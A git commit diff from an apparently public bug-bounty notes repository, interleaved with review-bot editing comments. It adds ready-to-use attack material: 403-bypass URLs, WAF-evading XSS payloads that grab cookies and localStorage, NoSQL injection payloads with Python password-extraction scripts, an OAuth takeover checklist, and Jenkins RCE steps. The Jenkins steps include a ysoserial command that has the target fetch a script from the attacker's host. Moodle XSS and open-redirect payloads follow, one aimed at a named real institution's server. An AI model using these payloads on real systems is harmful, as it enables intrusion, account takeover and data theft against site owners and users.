mirror of
https://github.com/daffainfo/AllAboutBugBounty.git
synced 2024-12-18 18:36:12 +00:00
Major Update, adding some tips
This commit is contained in:
parent
a71bcdd231
commit
338475aee1
@ -1,5 +1,11 @@
|
|||||||
# 403 Forbidden Bypass
|
# 403 Forbidden Bypass
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [Bypass-403 | Go script for bypassing 403 forbidden](https://github.com/daffainfo/bypass-403)
|
||||||
|
|
||||||
|
|
||||||
|
## Exploit
|
||||||
1. Using "X-Original-URL" header
|
1. Using "X-Original-URL" header
|
||||||
```
|
```
|
||||||
GET /admin HTTP/1.1
|
GET /admin HTTP/1.1
|
||||||
@ -21,15 +27,18 @@ Try this to bypass
|
|||||||
http://target.com/%2e/admin => 200
|
http://target.com/%2e/admin => 200
|
||||||
```
|
```
|
||||||
|
|
||||||
3. Try add dot (.) and slash (/) in the URL
|
3. Try add dot (.) slash (/) and semicolon (;) in the URL
|
||||||
```
|
```
|
||||||
http://target.com/admin => 403
|
http://target.com/admin => 403
|
||||||
```
|
```
|
||||||
Try this to bypass
|
Try this to bypass
|
||||||
```
|
```
|
||||||
http://target.com/admin/. => 200
|
http://target.com/secret/. => 200
|
||||||
http://target.com//admin// => 200
|
http://target.com//secret// => 200
|
||||||
http://target.com/./admin/./ => 200
|
http://target.com/./secret/.. => 200
|
||||||
|
http://target.com/;/secret => 200
|
||||||
|
http://target.com/.;/secret => 200
|
||||||
|
http://target.com//;//secret => 200
|
||||||
```
|
```
|
||||||
|
|
||||||
4. Add "..;/" after the directory name
|
4. Add "..;/" after the directory name
|
||||||
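Review bot: the rewritten third bypass line `http://target.com/./secret/..` normalises to `/`, not to `/secret`, so a 200 there only shows the site root is reachable and says nothing about the protected path; keep the old form `http://target.com/./admin/./` (or `/./secret/./`). The same block now uses `/admin` in the 403 example and `/secret` in every bypass example; use one path throughout so the before/after refers to the same resource. The new semicolon variants (`/;/secret`, `/.;/secret`, `//;//secret`) depend on servlet-container path-parameter handling (Tomcat/Jetty behind a stricter proxy) and do nothing against a plain nginx or Apache backend; one sentence saying when to try them would save readers time.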
@ -58,4 +67,6 @@ Host: victim.com
|
|||||||
X-Original-URL: /admin
|
X-Original-URL: /admin
|
||||||
```
|
```
|
||||||
|
|
||||||
Source: [@iam_j0ker](https://twitter.com/iam_j0ker)
|
Source:
|
||||||
|
- [@iam_j0ker](https://twitter.com/iam_j0ker)
|
||||||
|
- [Hacktricks](https://book.hacktricks.xyz/pentesting/pentesting-web)
|
||||||
|
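Review bot: the new Hacktricks entry links the general `pentesting/pentesting-web` index rather than the page the semicolon tricks were taken from; link the specific page or section so the attribution can be checked, as the `[@iam_j0ker](...)` entry above it does.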
@ -336,5 +336,50 @@ javascript://%250Aalert(1)
|
|||||||
<!--><svg onload=alert(1)-->
|
<!--><svg onload=alert(1)-->
|
||||||
```
|
```
|
||||||
|
|
||||||
|
## Bypass WAF
|
||||||
|
1. Cloudflare
|
||||||
|
```
|
||||||
|
<svg%0Aonauxclick=0;[1].some(confirm)//
|
||||||
|
|
||||||
|
<svg onload=alert%26%230000000040"")>
|
||||||
|
|
||||||
|
<a/href=j	a	v	asc
ri	pt:(a	l	e	r	t	(1))>
|
||||||
|
<svg onx=() onload=(confirm)(1)>
|
||||||
|
|
||||||
|
<svg onx=() onload=(confirm)(document.cookie)>
|
||||||
|
|
||||||
|
<svg onx=() onload=(confirm)(JSON.stringify(localStorage))>
|
||||||
|
|
||||||
|
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||||
|
|
||||||
|
"><img%20src=x%20onmouseover=prompt%26%2300000000000000000040;document.cookie%26%2300000000000000000041;
|
||||||
|
|
||||||
|
Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();
|
||||||
|
|
||||||
|
"><onx=[] onmouseover=prompt(1)>
|
||||||
|
|
||||||
|
%2sscript%2ualert()%2s/script%2u -xss popup
|
||||||
|
|
||||||
|
<svg onload=alert%26%230000000040"1")>
|
||||||
|
|
||||||
|
"Onx=() onMouSeoVer=prompt(1)>"Onx=[] onMouSeoVer=prompt(1)>"/*/Onx=""//onfocus=prompt(1)>"//Onx=""/*/%01onfocus=prompt(1)>"%01onClick=prompt(1)>"%2501onclick=prompt(1)>"onClick="(prompt)(1)"Onclick="(prompt(1))"OnCliCk="(prompt`1`)"Onclick="([1].map(confirm))
|
||||||
|
|
||||||
|
[1].map(confirm)'ale'+'rt'()a	l	e	r	t(1)prompt(1)prompt(1)prompt%26%2300000000000000000040;1%26%2300000000000000000041;(prompt())(prompt``)
|
||||||
|
|
||||||
|
<svg onload=prompt%26%230000000040document.domain)>
|
||||||
|
|
||||||
|
<svg onload=prompt%26%23x000000028;document.domain)>
|
||||||
|
|
||||||
|
<svg/onrandom=random onload=confirm(1)>
|
||||||
|
|
||||||
|
<video onnull=null onmouseover=confirm(1)>
|
||||||
|
|
||||||
|
<a id=x tabindex=1 onbeforedeactivate=print(`XSS`)></a><input autofocus>
|
||||||
|
|
||||||
|
:javascript%3avar{a%3aonerror}%3d{a%3aalert}%3bthrow%2520document.cookie
|
||||||
|
|
||||||
|
<img ignored=() src=x onerror=prompt(1)>
|
||||||
|
```
|
||||||
|
|
||||||
Reference:
|
Reference:
|
||||||
- [Brute Logic](https://brutelogic.com.br/)
|
- [Brute Logic](https://brutelogic.com.br/)
|
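Review bot: the payload `Function("\x61\x6c\x65\x72\x74\x28\x31\x29")();` appears twice in the new Bypass WAF block; drop one copy. Two further lines are several payloads run together with no separator (the one starting `"Onx=() onMouSeoVer=prompt(1)>` and the one starting `[1].map(confirm)'ale'+'rt'()`); put one vector per line like the rest of the block, otherwise a reader cannot tell where one ends and the next begins. The entry `%2sscript%2ualert()%2s/script%2u -xss popup` is not valid percent-encoding (`%2s` and `%2u` are not hex octets) and carries a stray trailing note; give the intended bytes or remove it. The `<a/href=j a v asc ri pt:(a l e r t (1))>` payload depends on literal tab characters between the letters and is already split across two lines here, so state the separator explicitly (`&#9;` or `%09`) rather than relying on whitespace surviving copy-paste.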
@ -1,14 +1,14 @@
|
|||||||
# Broken Link Hijacking
|
# Broken Link Hijacking
|
||||||
## **Introduction**
|
|
||||||
Broken Link Hijacking (BLH) exists whenever a target links to an expired domain or page
|
|
||||||
|
|
||||||
## **How to Find**
|
## Tools
|
||||||
|
- [broken-link-checker](https://github.com/stevenvachon/broken-link-checker)
|
||||||
|
|
||||||
|
## Definition
|
||||||
|
Broken Link Hijacking exists whenever a target links to an expired domain or page
|
||||||
|
|
||||||
|
## How to find
|
||||||
1. Manually find external links on the target site (For example, check some links to social media accounts)
|
1. Manually find external links on the target site (For example, check some links to social media accounts)
|
||||||
2. Try [broken-link-checker](https://github.com/stevenvachon/broken-link-checker) tools to find broken link, this is the command
|
2. Try using tools to find broken link, for example using tools that listed in this readme
|
||||||
|
|
||||||
```
|
|
||||||
blc -rof --filter-level 3 https://vuln.com/
|
|
||||||
```
|
|
||||||
|
|
||||||
References:
|
References:
|
||||||
- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
|
- [Broken Link Hijacking - How expired links can be exploited.](https://edoverflow.com/2017/broken-link-hijacking/)
|
||||||
|
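Review bot: the concrete invocation `blc -rof --filter-level 3 https://vuln.com/` is deleted and replaced by "Try using tools to find broken link, for example using tools that listed in this readme", which is ungrammatical and removes the only runnable step on the page; keep the command as a fenced block under the new `broken-link-checker` Tools entry and reword the step to "Try the tools listed above to find broken links". The Definition line also drops the "BLH" abbreviation that the edoverflow reference uses; keep it.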
10
Misc/Exposed API keys.md
Normal file
10
Misc/Exposed API keys.md
Normal file
@ -0,0 +1,10 @@
|
|||||||
|
# Exposed API Keys
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
* [Key-Checker](https://github.com/daffainfo/Key-Checker)
|
||||||
|
|
||||||
|
## Definition
|
||||||
|
Sometimes in a web application, an attacker can find some exposed API keys which can lead to financial loss to a company.
|
||||||
|
|
||||||
|
## How to exploit
|
||||||
|
[keyhacks](https://github.com/streaak/keyhacks) is a repository which shows quick ways in which API keys leaked by a bug bounty program can be checked to see if they're valid. There is 79 list of how to check the validity of the API keys
|
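Review bot: the "How to exploit" paragraph reads "There is 79 list of how to check the validity of the API keys"; make it "It lists 79 ways to check whether a leaked key is still valid", and since keyhacks is the tool actually used in this step, list it under Tools beside Key-Checker. The Definition line says only that exposed keys "can lead to financial loss"; naming where they typically leak (JavaScript bundles, source maps, public repositories, HTTP responses) would make the section actionable.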
@ -1 +1,143 @@
|
|||||||
# Soon!
|
## NoSQL injection
|
||||||
|
|
||||||
|
## Tools
|
||||||
|
|
||||||
|
* [NoSQLmap - Automated NoSQL database enumeration and web application exploitation tool](https://github.com/codingo/NoSQLMap)
|
||||||
|
|
||||||
|
## Exploit
|
||||||
|
|
||||||
|
### Authentication Bypass
|
||||||
|
|
||||||
|
Basic authentication bypass using not equal ($ne) or greater ($gt)
|
||||||
|
|
||||||
|
```
|
||||||
|
in the request
|
||||||
|
- username[$ne]=toto&password[$ne]=toto
|
||||||
|
- login[$regex]=a.*&pass[$ne]=lol
|
||||||
|
- login[$gt]=admin&login[$lt]=test&pass[$ne]=1
|
||||||
|
- login[$nin][]=admin&login[$nin][]=test&pass[$ne]=toto
|
||||||
|
```
|
||||||
|
|
||||||
|
```json
|
||||||
|
The output is
|
||||||
|
{"username": {"$ne": null}, "password": {"$ne": null}}
|
||||||
|
{"username": {"$ne": "foo"}, "password": {"$ne": "bar"}}
|
||||||
|
{"username": {"$gt": undefined}, "password": {"$gt": undefined}}
|
||||||
|
{"username": {"$gt":""}, "password": {"$gt":""}}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extract length information
|
||||||
|
|
||||||
|
```json
|
||||||
|
username[$ne]=toto&password[$regex]=.{1}
|
||||||
|
username[$ne]=toto&password[$regex]=.{3}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extract data information
|
||||||
|
|
||||||
|
```json
|
||||||
|
in URL
|
||||||
|
username[$ne]=toto&password[$regex]=m.{2}
|
||||||
|
username[$ne]=toto&password[$regex]=md.{1}
|
||||||
|
username[$ne]=toto&password[$regex]=mdp
|
||||||
|
|
||||||
|
username[$ne]=toto&password[$regex]=m.*
|
||||||
|
username[$ne]=toto&password[$regex]=md.*
|
||||||
|
|
||||||
|
in JSON
|
||||||
|
{"username": {"$eq": "admin"}, "password": {"$regex": "^m" }}
|
||||||
|
{"username": {"$eq": "admin"}, "password": {"$regex": "^md" }}
|
||||||
|
{"username": {"$eq": "admin"}, "password": {"$regex": "^mdp" }}
|
||||||
|
```
|
||||||
|
|
||||||
|
### Extract data with "in"
|
||||||
|
|
||||||
|
```json
|
||||||
|
{"username":{"$in":["Admin", "4dm1n", "admin", "root", "administrator"]},"password":{"$gt":""}}
|
||||||
|
```
|
||||||
|
|
||||||
|
### PHP Arbitrary Function Execution
|
||||||
|
```json
|
||||||
|
"user":{"$func": "var_dump"}
|
||||||
|
```
|
||||||
|
|
||||||
|
## Blind NoSQL
|
||||||
|
|
||||||
|
### POST
|
||||||
|
|
||||||
|
```python
|
||||||
|
import requests
|
||||||
|
import urllib3
|
||||||
|
import string
|
||||||
|
import urllib
|
||||||
|
urllib3.disable_warnings()
|
||||||
|
|
||||||
|
username="admin"
|
||||||
|
password=""
|
||||||
|
u="http://example.org/login"
|
||||||
|
headers={'content-type': 'application/json'}
|
||||||
|
|
||||||
|
while True:
|
||||||
|
for c in string.printable:
|
||||||
|
if c not in ['*','+','.','?','|']:
|
||||||
|
payload='{"username": {"$eq": "%s"}, "password": {"$regex": "^%s" }}' % (username, password + c)
|
||||||
|
r = requests.post(u, data = payload, headers = headers, verify = False, allow_redirects = False)
|
||||||
|
if 'OK' in r.text or r.status_code == 302:
|
||||||
|
print("Found one more char : %s" % (password+c))
|
||||||
|
password += c
|
||||||
|
```
|
||||||
|
|
||||||
|
### GET
|
||||||
|
|
||||||
|
```python
|
||||||
|
import requests
|
||||||
|
import urllib3
|
||||||
|
import string
|
||||||
|
import urllib
|
||||||
|
urllib3.disable_warnings()
|
||||||
|
|
||||||
|
username='admin'
|
||||||
|
password=''
|
||||||
|
u='http://example.org/login'
|
||||||
|
|
||||||
|
while True:
|
||||||
|
for c in string.printable:
|
||||||
|
if c not in ['*','+','.','?','|', '#', '&', '$']:
|
||||||
|
payload='?username=%s&password[$regex]=^%s' % (username, password + c)
|
||||||
|
r = requests.get(u + payload)
|
||||||
|
if 'Yeah' in r.text:
|
||||||
|
print("Found one more char : %s" % (password+c))
|
||||||
|
password += c
|
||||||
|
```
|
||||||
|
|
||||||
|
Another example using sleep to check vuln or not
|
||||||
|
```
|
||||||
|
'%2bsleep(1)%2b'
|
||||||
|
```
|
||||||
|
|
||||||
|
### MongoDB Payloads
|
||||||
|
|
||||||
|
```bash
|
||||||
|
true, $where: '1 == 1'
|
||||||
|
, $where: '1 == 1'
|
||||||
|
$where: '1 == 1'
|
||||||
|
', $where: '1 == 1'
|
||||||
|
1, $where: '1 == 1'
|
||||||
|
{ $ne: 1 }
|
||||||
|
', $or: [ {}, { 'a':'a
|
||||||
|
' } ], $comment:'successful MongoDB injection'
|
||||||
|
db.injection.insert({success:1});
|
||||||
|
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|
||||||
|
|| 1==1
|
||||||
|
' && this.password.match(/.*/)//+%00
|
||||||
|
' && this.passwordzz.match(/.*/)//+%00
|
||||||
|
'%20%26%26%20this.password.match(/.*/)//+%00
|
||||||
|
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
|
||||||
|
{$gt: ''}
|
||||||
|
[$ne]=1
|
||||||
|
```
|
||||||
|
|
||||||
|
## References
|
||||||
|
|
||||||
|
* [Hacktricks](https://book.hacktricks.xyz/pentesting-web/nosql-injection)
|
||||||
|
* [PayloadAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/NoSQL%20Injection/README.md)
|
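Review bot: both blind-extraction scripts (`### POST` and `### GET`) are `while True:` loops with no exit condition: once the whole password has been recovered no candidate matches, the inner `for` completes without appending anything, and the loop spins forever against the target; set a flag when a character is found and `break` out of the `while` after a full pass over `string.printable` finds nothing. The exclusion list `['*','+','.','?','|']` also misses regex metacharacters such as `(`, `)`, `[`, `]`, `{`, `}`, `^`, `$` and `\`; a password containing one of them either breaks the query or yields a false positive, so escape the candidate (and JSON-escape the resulting backslash) instead of skipping characters. Minor points: `import urllib` is unused in both scripts; the block fenced as ```json that begins "The output is" mixes prose with JSON and should be split; the `"$func": "var_dump"` payload is an operator of the PHP MongoLite library rather than of MongoDB's query language, which the heading should say; and the title is `## NoSQL injection` while the sibling files use a level-one `#` heading.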
13
OAuth Misconfiguration.md
Normal file
13
OAuth Misconfiguration.md
Normal file
@ -0,0 +1,13 @@
|
|||||||
|
# OAuth Misconfiguration
|
||||||
|
1. OAuth token stealing: Changing redirect_uri to attacker(.)com(Use IDN Homograph or common bypasses).
|
||||||
|
2. Change Referral header to attacker(.)com while requesting OAuth.
|
||||||
|
3. Create an account with victim@gmail(.)com with normal functionality. Create account with victim@gmail(.)com using OAuth functionality. Now try to login using previous credentials.
|
||||||
|
4. OAuth Token Re-use.
|
||||||
|
5. Missing or broken state parameter.
|
||||||
|
6. Lack of origin check.
|
||||||
|
7. Open Redirection on another endpoint > Use it in redirect_uri
|
||||||
|
8. If there is an email parameter after signin then try to change the email parameter to victim's one.
|
||||||
|
9. Try to remove email from the scope and add victim's email manually.
|
||||||
|
10. Only company's email is allowed? > Try to replace hd=company(.)com to hd=gmail(.)com
|
||||||
|
11. Check if its leaking client_secret parameter.
|
||||||
|
12. Go to the browser history and check if the token is there.
|
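Review bot: item 2 says "Change Referral header"; the HTTP header is `Referer`, and the check being described is whether the provider validates `redirect_uri` (or the allowed origin) against it, so name the header correctly. Item 3 describes an account pre-hijack but the order of operations is ambiguous; spell it out: register normally with the victim's address first, then sign in through OAuth with an identity asserting the same address, and check whether the two accounts are merged without verification. Item 10's `hd=company(.)com` is Google's hosted-domain parameter, which the list should say. Item 12, "check if the token is there" in browser history, only applies when the token travels in the URL (implicit-flow fragment or query); saying so explains why history and Referer leakage matter.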
24
README.md
24
README.md
@ -1,18 +1,24 @@
|
|||||||
# All about bug bounty
|
# All about bug bounty
|
||||||
These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
|
These are my bug bounty notes that I have gathered from various sources, you can contribute to this repository too!
|
||||||
|
|
||||||
|
![](https://img.shields.io/github/issues/daffainfo/AllAboutBugBounty)
|
||||||
|
![](https://img.shields.io/github/forks/daffainfo/AllAboutBugBounty)
|
||||||
|
![](https://img.shields.io/github/stars/daffainfo/AllAboutBugBounty)
|
||||||
|
![](https://img.shields.io/github/last-commit/daffainfo/AllAboutBugBounty)
|
||||||
|
|
||||||
## List
|
## List
|
||||||
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
|
- [Business Logic Errors](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Business%20Logic%20Errors.md)
|
||||||
- SQL Injection (SOON)
|
|
||||||
- NoSQL Injection (SOON)
|
|
||||||
- Local File Inclusion (SOON)
|
|
||||||
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
|
- [Cross Site Request Forgery (CSRF)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Request%20Forgery.md)
|
||||||
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
|
- [Cross Site Scripting (XSS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Cross%20Site%20Scripting.md)
|
||||||
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
|
||||||
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
|
|
||||||
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
|
- [Denial of Service (DoS)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Denial%20Of%20Service.md)
|
||||||
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
|
- [Exposed Source Code](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Exposed%20Source%20Code.md)
|
||||||
- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
|
- [Host Header Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Host%20Header%20Injection.md)
|
||||||
|
- [Insecure Direct Object References (IDOR)](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Insecure%20Direct%20Object%20References.md)
|
||||||
|
- Local File Inclusion (SOON)
|
||||||
|
- [NoSQL Injection](https://github.com/daffainfo/AllAboutBugBounty/blob/master/NoSQL%20Injection.md)
|
||||||
|
- SQL Injection (SOON)
|
||||||
|
- [OAuth Misconfiguration](https://github.com/daffainfo/AllAboutBugBounty/blob/master/OAuth%20Misconfiguration.md)
|
||||||
|
- [Open Redirect](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Open%20Redirect.md)
|
||||||
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
- [Web Cache Poisoning](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Web%20Cache%20Poisoning.md)
|
||||||
|
|
||||||
## List Bypass
|
## List Bypass
|
||||||
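Review bot: the reordered list is alphabetical up to "NoSQL Injection" but then places "SQL Injection (SOON)" between NoSQL and OAuth; move it after "Open Redirect" (or group the two injection entries on purpose and say so) so the ordering rule is consistent. The four shields.io badges added at the top use `![]()` with empty alt text; give them alt text (issues, forks, stars, last commit) for readers of the raw file.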
@ -28,7 +34,7 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
|
|
||||||
## List Framework
|
## List Framework
|
||||||
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
|
- [Laravel](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Laravel.md)
|
||||||
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.MD)
|
- [Zend](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Framework/Zend.md)
|
||||||
|
|
||||||
## Miscellaneous
|
## Miscellaneous
|
||||||
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
- [Account Takeover](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Account%20Takeover.md)
|
||||||
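Review bot: the Zend link changes from `Framework/Zend.MD` to `Framework/Zend.md`, but this commit shows no rename of that file; GitHub paths are case-sensitive, so the new link 404s unless `Zend.MD` was renamed elsewhere. Verify the filename on disk matches the link.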
@ -38,7 +44,11 @@ These are my bug bounty notes that I have gathered from various sources, you can
|
|||||||
- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
|
- [Mass Assignment](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Mass%20Assignment.md)
|
||||||
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
|
- [Password Reset Flaws](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Password%20Reset%20Flaws.md)
|
||||||
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
- [Tabnabbing](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Tabnabbing.md)
|
||||||
- [Unauthenticated Jira CVE](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Misc/Unauthenticated%20Jira%20CVE.md)
|
|
||||||
|
## Technologies
|
||||||
|
- [Jira](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jira.md)
|
||||||
|
- [Jenkins](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Jenkins.md)
|
||||||
|
- [Moodle](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Technologies/Moodle.md)
|
||||||
|
|
||||||
## Reconnaissance
|
## Reconnaissance
|
||||||
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
- [Scope Based Recon](https://github.com/daffainfo/AllAboutBugBounty/blob/master/Recon/Scope.md)
|
||||||
|
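Review bot: `Misc/Unauthenticated Jira CVE.md` is dropped from the Miscellaneous list and `Technologies/Jira.md` is added under the new Technologies section, but this commit neither deletes the Misc file nor shows a rename; if the file still exists it becomes an orphan, and if its content was merged into Technologies/Jira.md the commit should say so. The new section also lists Jira before Jenkins; alphabetical order (Jenkins, Jira, Moodle) would match the rest of the README.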
66
Technologies/Jenkins.md
Normal file
66
Technologies/Jenkins.md
Normal file
@ -0,0 +1,66 @@
|
|||||||
|
## Jenkins
|
||||||
|
1. Deserialization RCE in old Jenkins (CVE-2015-8103, Jenkins 1.638 and older)
|
||||||
|
|
||||||
|
Use [ysoserial](https://github.com/frohoff/ysoserial) to generate a payload.
|
||||||
|
Then RCE using [this script](./rce/jenkins_rce_cve-2015-8103_deser.py):
|
||||||
|
|
||||||
|
```bash
|
||||||
|
java -jar ysoserial-master.jar CommonsCollections1 'wget myip:myport -O /tmp/a.sh' > payload.out
|
||||||
|
./jenkins_rce.py jenkins_ip jenkins_port payload.out
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Authentication/ACL bypass (CVE-2018-1000861, Jenkins <2.150.1)
|
||||||
|
|
||||||
|
Details [here](https://blog.orange.tw/2019/01/hacking-jenkins-part-1-play-with-dynamic-routing.html).
|
||||||
|
|
||||||
|
If the Jenkins requests authentication but returns valid data using the following request, it is vulnerable:
|
||||||
|
```bash
|
||||||
|
curl -k -4 -s https://example.com/securityRealm/user/admin/search/index?q=a
|
||||||
|
```
|
||||||
|
|
||||||
|
3. Metaprogramming RCE in Jenkins Plugins (CVE-2019-1003000, CVE-2019-1003001, CVE-2019-1003002)
|
||||||
|
|
||||||
|
Original RCE vulnerability [here](https://blog.orange.tw/2019/02/abusing-meta-programming-for-unauthenticated-rce.html), full exploit [here](https://github.com/petercunha/jenkins-rce).
|
||||||
|
|
||||||
|
Alternative RCE with Overall/Read and Job/Configure permissions [here](https://github.com/adamyordan/cve-2019-1003000-jenkins-rce-poc).
|
||||||
|
|
||||||
|
4. CVE-2019-1003030
|
||||||
|
|
||||||
|
How to Exploit:
|
||||||
|
- [PacketStorm](https://packetstormsecurity.com/files/159603/Jenkins-2.63-Sandbox-Bypass.html)
|
||||||
|
|
||||||
|
```
|
||||||
|
GET /jenkinselj/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {
|
||||||
|
public x(){
|
||||||
|
"ping -c 1 xx.xx.xx.xx".execute()
|
||||||
|
}
|
||||||
|
} HTTP/1.1
|
||||||
|
Host: 127.0.0.1
|
||||||
|
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
|
||||||
|
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||||||
|
Accept-Language: en-US,en;q=0.5
|
||||||
|
Accept-Encoding: gzip, deflate
|
||||||
|
Cookie: JSESSIONID.4495c8e0=node01jguwrtw481dx1bf3gaoq5o6no32.node0
|
||||||
|
Connection: close
|
||||||
|
Upgrade-Insecure-Requests: 1
|
||||||
|
```
|
||||||
|
URL Encoding the following for RCE
|
||||||
|
```
|
||||||
|
public class x {
|
||||||
|
public x(){
|
||||||
|
"ping -c 1 xx.xx.xx.xx".execute()
|
||||||
|
}
|
||||||
|
}
|
||||||
|
```
|
||||||
|
to
|
||||||
|
|
||||||
|
%70%75%62%6c%69%63%20%63%6c%61%73%73%20%78%20%7b%0a%20%20%70%75%62%6c%69%63%20%78%28%29%7b%0a%22%70%69%6e%67%20%2d%63%20%31%20%78%78%2e%78%78%2e%78%78%2e%78%78%22%2e%65%78%65%63%75%74%65%28%29%0a%7d%0a%7d
|
||||||
|
|
||||||
|
5. Git plugin (<3.12.0) RCE in Jenkins (CVE-2019-10392)
|
||||||
|
|
||||||
|
How to exploit:
|
||||||
|
- [@jas502n](https://github.com/jas502n/CVE-2019-10392)
|
||||||
|
- [iwantmore.pizza](https://iwantmore.pizza/posts/cve-2019-10392.html)
|
||||||
|
|
||||||
|
Reference:
|
||||||
|
- https://github.com/gquere/pwn_jenkins
|
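Review bot: item 1 links `./rce/jenkins_rce_cve-2015-8103_deser.py` as a path relative to this repository, but nothing in this commit adds an `rce/` directory; the script belongs to the gquere/pwn_jenkins repo cited at the bottom, so link it there, and note that the usage line `./jenkins_rce.py jenkins_ip jenkins_port payload.out` uses a different filename from the link. In item 4 the request line begins `GET /jenkinselj/securityRealm/...`, which looks like the context path of the instance the request was captured on; use `/jenkins/` or a `<JENKINS_URL>` placeholder as the Jira file does, and drop the captured `Cookie: JSESSIONID.4495c8e0=...` and browser headers, which add nothing to the exploit. The file heading is also `## Jenkins` where Moodle uses `# Moodle`.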
@ -60,3 +60,6 @@ Connection: close
|
|||||||
```
|
```
|
||||||
https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
|
https://<JIRA_URL>/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=%3Cscript%3Ealert(1)%3C/script%3E&Search=Search
|
||||||
```
|
```
|
||||||
|
|
||||||
|
Reference:
|
||||||
|
- https://twitter.com/harshbothra
|
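Review bot: the added reference is a bare profile URL (`https://twitter.com/harshbothra`); link the specific post the XSS payload above came from, as the 403 file does with its named `[@iam_j0ker](...)` entry, so the source can be checked.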
12
Technologies/Moodle.md
Normal file
12
Technologies/Moodle.md
Normal file
@ -0,0 +1,12 @@
|
|||||||
|
# Moodle
|
||||||
|
|
||||||
|
1. Reflected XSS in /mod/lti/auth.php via “redirect_url” parameter
|
||||||
|
```
|
||||||
|
https://target.com/mod/lti/auth.php?redirect_uri=javascript:alert(1)
|
||||||
|
```
|
||||||
|
|
||||||
|
2. Open redirect in /mod/lti/auth.php in “redirect_url” parameter
|
||||||
|
|
||||||
|
```
|
||||||
|
https://classroom.its.ac.id/mod/lti/auth.php?redirect_uri=https://evil.com
|
||||||
|
```
|
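Review bot: both headings name the parameter "redirect_url" while both payloads use `redirect_uri`; the payloads suggest `redirect_uri` is the one the endpoint reads, so use it in the headings too. Item 2's example targets a real third-party host, `https://classroom.its.ac.id/...`; replace it with `https://target.com/...` as item 1 does, since a public note should not point at a named live instance. Neither item states an affected Moodle version or advisory, which the Jenkins file gives for each entry; add one if known.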